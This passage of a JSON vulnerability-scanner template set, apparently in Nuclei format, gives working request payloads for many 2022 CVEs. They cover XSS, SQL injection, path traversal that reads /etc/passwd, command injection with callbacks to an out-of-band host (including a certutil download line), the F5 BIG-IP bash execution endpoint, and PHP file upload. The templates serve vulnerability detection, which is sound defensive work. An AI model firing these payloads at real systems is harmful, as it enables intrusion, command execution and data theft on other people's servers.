Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-39048","info":{"name":"ServiceNow - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /navpage.do HTTP/1.1\nHost: {{Hostname}}\n","POST /login.do HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsysparm_ck={{csrf}}&user_name={{username}}&user_password={{password}}&not_important=&ni.nolog.user_password=true&ni.noecho.user_name=true&ni.noecho.user_password=true&screensize=1920x1080&sys_action=sysverb_login&sysparm_login_url=welcome.do\n","GET /assessment_redirect.do?sysparm_survey_url=javascript:alert(document.domain)//assessment_take2.do HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["unwrapped_url = \"javascript:alert(document.domain)//assessment_take2.do\"","assessment_list.do"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name=\"sysparm_ck\" id=\"sysparm_ck\" type=\"hidden\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-1170","info":{"name":"JobMonster < 4.5.2.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","noo-resume"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31975","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0140","info":{"name":"WordPress Visual Form Builder <3.0.8 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin.php?page=vfb-export HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}/wp-admin/admin.php?page=vfb-export\nContent-Type: application/x-www-form-urlencoded\nOrigin: {{RootURL}}\n\nvfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Date Submitted\"","\"Entries ID\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32026","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_booking.php?id=-1%20union%20select%201,2,3,4,5,6,md5({{num}}),8,9,10,11--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38553","info":{"name":"Academy Learning Management System <5.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>","Study any topic"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-42095","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntitle={{randstr}}&body%5Bund%5D%5B0%5D%5Bsummary%5D=&body%5Bund%5D%5B0%5D%5Bvalue%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E%0D%0A&body%5Bund%5D%5B0%5D%5Bformat%5D=full_html&changed=&form_build_id={{form_id_2}}&form_token={{form_token}}&form_id=page_node_form&status=1&scheduled%5Bdate%5D=2023-04-14&scheduled%5Btime%5D=21%3A00%3A54&name=admin&date%5Bdate%5D=2023-04-13&date%5Btime%5D=21%3A00%3A54&path%5Bauto%5D=1&menu%5Benabled%5D=1&menu%5Blink_title%5D=test&menu%5Bdescription%5D=&menu%5Bparent%5D=main-menu%3A0&menu%5Bweight%5D=0&comment=1&additional_settings__active_tab=&op=Save\n","POST /?q={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_5 == 200","contains(header_5, 'text/html')","contains(body_5, \"<img src=\\\"x\\\" onerror=\\\"alert(document.domain)\\\" />\")","contains(body_5, 'Backdrop CMS')"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-27593","info":{"name":"QNAP QTS Photo Station External Reference - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php."],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["!function(p,qa){","module.exports","application/javascript"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-3142","info":{"name":"NEX-Forms Plugin < 7.9.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 30s\nGET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1+AND+(SELECT+42+FROM+(SELECT(SLEEP(7)))b)-- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code_2 == 200","contains(body_2, \"NEX-Forms\")","contains(content_type_2, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2022-25497","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//../../../../../../../../../../../../../etc/passwd\",\"to\":\"/../{{randstr}}.txt\",\"action\":\"copyFile\"}\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/plain"]},{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0424","info":{"name":"Popup by Supsystic < 1.10.9 - Subscriber Email Addresses Disclosure","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npage=subscribe&action=getListForTbl&reqType=ajax&search=@&_search=false&pl=pps&sidx=id&rows=10\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"id\":\"","username\":\"","email\":","hash\":\"","_wpnonce"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(7)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1162","info":{"name":"GitLab CE/EE - Hard-Coded Credentials","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0785","info":{"name":"WordPress Daily Prayer Time <2022.03.01 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=get_monthly_timetable&month=1+AND+(SELECT+6881+FROM+(SELECT(SLEEP(6)))iEAn) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"dptTimetable customStyles dptUserStyles\")"],"condition":"and"}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-35405","info":{"name":"Zoho ManageEngine - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{RootURL}}/xmlrpc"],"body":"<?xml version=\"1.0\"?><methodCall><methodName>{{randstr}}</methodName><params><param><value>big0us</value></param></params></methodCall>\n","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>faultString</name>"]},{"type":"word","part":"body","words":["No such service [{{randstr}}]","No such handler: {{randstr}}"],"condition":"or"},{"type":"word","part":"body","words":["<methodResponse>","</methodResponse>"],"condition":"or"}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0826","info":{"name":"WordPress WP Video Gallery <=1.7.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wp_video_gallery_ajax_add_single_youtube&url=http://oast.me/?x%26v=1%2522 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%2523\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Registred videos :\")"],"condition":"and"}]}]},{"id":"CVE-2022-1574","info":{"name":"WordPress HTML2WP <=1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 253\nContent-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990\nConnection: close\n\n-----------------------------7816508136577551742878603990\nContent-Disposition: form-data; name=\"local_importing[]\"; filename=\"{{randstr}}.php\"\nContent-Type: text/html\n\n<?php\n\necho \"File Upload success\";\n\n-----------------------------7816508136577551742878603990--\n","GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 200","contains(body_2, 'File Upload success')"],"condition":"and"}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1388","info":{"name":"F5 BIG-IP iControl - REST Auth Bypass RCE","severity":"critical"},"requests":[{"raw":["POST /mgmt/tm/util/bash HTTP/1.1\nHost: {{Hostname}}\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n","POST /mgmt/tm/util/bash HTTP/1.1\nHost: localhost\nConnection: keep-alive, X-F5-Auth-Token\nX-F5-Auth-Token: a\nAuthorization: Basic {{base64(auth)}}\nContent-Type: application/json\n\n{\n     \"command\": \"run\",\n     \"utilCmdArgs\": \"-c '{{cmd}}'\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["commandResult","8831-2202-EVC"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-4050","info":{"name":"WordPress JoomSport <5.2.8 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmdId=1&shattr={\"id\":\"1+AND+(SELECT+1+FROM(SELECT+SLEEP(7))aaaa);--+-\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"jscaruselcont jsview2\")"],"condition":"and"}]}]},{"id":"CVE-2022-3062","info":{"name":"Simple File List < 4.4.12 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab=\"style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"ee-simple-file-list\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")"],"condition":"and"}]}]},{"id":"CVE-2022-34590","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hms/admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Admin  | Dashboard</title>","Manage Patients","Manage Doctors"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site 